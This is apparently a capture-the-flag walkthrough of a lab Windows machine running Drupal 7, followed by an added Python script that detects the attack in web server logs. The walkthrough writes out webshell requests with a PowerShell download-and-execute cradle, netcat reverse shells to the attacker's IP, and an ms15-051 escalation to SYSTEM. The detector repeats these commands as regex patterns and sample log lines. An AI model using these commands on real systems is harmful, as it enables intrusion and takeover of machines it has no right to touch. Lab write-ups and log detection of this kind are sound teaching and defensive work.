Difficulty: Medium
Machine Creator: ch4p
Tools Used: NMAP, Droopescan, Searchsploit, PHP, Burp Suite, Remote Code Execution, PowerShell Empire: PowerUp.ps1, Sherlock, Netcat
Task: To find User.txt and Root.txt
Let’s start with an NMAP scan.
nmap -sV -sC 10.10.10.9
HTTP – Drupal
For Drupal we can use a tool called droopescan. We can install it with the Python pip installer.
apt-get install python-pip
pip install droopescan
Now we can run droopescan against the remote server. This will take a while to finish.
droopescan scan drupal -u http://10.10.10.9
We know this is a Drupal 7 server, so let's use searchsploit to see if there are any vulnerabilities we may be able to use.
Let's copy the exploit to our working directory.
cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
We need to manually edit this exploit, which is written in PHP. First install php-curl.
apt-get install php-curl
Let's set up port forwarding. We will direct everything pointing to localhost:1337 to 10.10.10.9:80.
Now set up the request handling.
Now we need to update our exploit to route through the proxy.
Remote Code Execution
We can find vulnerabilities using PowerUp from PowerShell Empire. Let's download PowerShell Empire.
Now that we have PSE downloaded, let's copy PowerUp.ps1 so we can edit it.
cp Empire/data/module_source/privesc/PowerUp.ps1 .
Now we need to pull PowerUp.ps1 from our web server and execute it on the remote machine.
In the webshell we can add this command.
http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/PowerUp.ps1') | powershell -noprofile -
Looking at the results we can see "access denied", which tells us that we don't have admin rights.
Going through the results there is nothing that can help us elevate our permissions.
Let's try finding a vulnerability using Sherlock.ps1.
We can copy and execute Sherlock the same way we did PowerUp.
10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/Sherlock.ps1') | powershell -noprofile -
Reverse Shell Netcat
Before we do our privilege escalation we need a remote shell. We can do this with the x64 version of netcat.
Unzip the netcat files so we can upload and run them.
Set up our netcat listener.
nc -lvnp 8081
Make sure the Python SimpleHTTPServer is running.
python -m SimpleHTTPServer
Enter the following URL in the browser to upload netcat x64 and create a reverse shell.
http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081
Similar to the previous netcat step, we're going to execute the existing nc file and create a second reverse shell running as SYSTEM.
nc -lvnp 8082
10.10.10.9/exploit.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc -e 10.10.14.11 8082"
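From the defender's side, every step above leaves a distinctive request in the web server log: webshell-style parameters (fexec/fupload), a PowerShell download cradle, and netcat or exploit binary names. The following is an added example (not part of the write-up) that scans constructed, simplified log lines for those indicators; the log format and sample lines are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the requests in the write-up above.
INDICATORS = {
    "webshell_param": re.compile(r"\b(fexec|fupload)=", re.I),
    "ps_download_cradle": re.compile(r"IEX\s*\(?\s*New-Object\s+Net\.WebClient", re.I),
    "ps_downloadstring": re.compile(r"\.DownloadString\(", re.I),
    "netcat_reverse_shell": re.compile(r"\bnc(64)?(\.exe)?\s+-e\s", re.I),
    "known_privesc_binary": re.compile(r"ms15-051", re.I),
}

# Assumed simplified log format: "date time client method path query status".
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"(?P<query>\S+) (?P<status>\d{3})$"
)

# Constructed sample log lines mirroring the requests shown in the write-up.
SAMPLE_LOG = [
    "2017-03-19 10:01:02 10.10.14.11 GET /user/login - 200",
    "2017-03-19 10:02:10 10.10.14.11 GET /exploit.php fexec=echo+IEX(New-Object+Net.WebClient)"
    ".DownloadString('http://10.10.14.11:8000/PowerUp.ps1')+%7C+powershell+-noprofile+- 200",
    "2017-03-19 10:05:44 10.10.14.11 GET /exploit.php fupload=nc64.exe&fexec=nc64.exe+-e+cmd+10.10.14.11+8081 200",
    "2017-03-19 10:07:30 10.10.14.11 GET /exploit.php fupload=ms15-051x64.exe&fexec=ms15-051x64.exe"
    "+%22nc+-e+10.10.14.11+8082%22 200",
    "2017-03-19 10:08:00 10.10.14.11 GET /node/1 - 200",
]


def analyse_line(line):
    """Parse one log line; return a record with the matched indicator names, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode URL encoding so '+' and %7C become the spaces and pipe the server actually saw.
    query = unquote_plus(m["query"]) if m["query"] != "-" else ""
    target = m["path"] + "?" + query
    hits = [name for name, rx in INDICATORS.items() if rx.search(target)]
    # Several independent indicators in one request is a stronger signal than a single match.
    severity = "high" if len(hits) > 1 else ("medium" if hits else "none")
    return {"ts": m["ts"], "src": m["src"], "path": m["path"], "hits": hits, "severity": severity}


def scan(lines):
    """Return only the records that matched at least one indicator."""
    return [rec for rec in map(analyse_line, lines) if rec and rec["hits"]]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ts"], alert["src"], alert["severity"], ",".join(alert["hits"]))
```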
User.txt and Root.txt